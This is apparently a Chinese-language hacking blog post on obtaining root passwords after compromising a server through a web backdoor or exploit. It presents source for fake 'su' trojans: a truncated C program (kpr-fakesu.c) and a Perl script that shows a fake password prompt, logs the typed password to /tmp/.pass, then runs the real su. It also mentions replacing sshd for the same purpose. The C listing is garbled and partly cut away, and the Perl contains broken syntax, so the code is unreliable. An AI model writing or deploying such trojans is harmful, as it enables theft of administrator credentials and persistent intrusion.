摘要
在webbackdoor本身是root (可能性小的可怜)或通过某漏洞 溢出成功得到最高权限后,如果能获取root密码能给我们带来很多的好处。查询了一下前辈的方法,一个是欺骗su记录密码,另外一个是替换sshd,我们先看看欺骗su记录密码的代码吧!
在webbackdoor本身是
先看第一种,kpr-fakesu.c V0.9beta167
fucksu.c /* * kpr-fakesu.c V0.9beta167 ;P * by koper >.bash_profile * [email protected]:~$ logout * *** LOGIN *** * [email protected]:~$ su * Password: * su: Authentication failure * Sorry. * [email protected]:~$ su * Password: * [email protected]:~# logout * [email protected]:~$ cat /var/tmp/.pwds * [email protected]:~$ * * /bin/su sends various failure information depending on the OS ver. * Please modify the source to make it “fit” ;) * */ #include #i[email protected]”); }
perl版本
perl版本:
#!/usr/bin/perl #################################################################################################### # [email protected] 2006 su trojan check so the su path is correct. # # then make alias for trojan first it reads the pass then exec the real su. # # logging to /tmp/.pass # #################################################################################################### print “Password: “; $s1=; print “Sorry.n”; $s2=”Password is: “; $s3=date +%Y-%m-%d; open (users, “>>/tmp/.pass”) || die (“Could not open file. $!”); print users ($s2, $s1,$s3); close (users); system(“/bin/su”) 另一种方法,替换sshd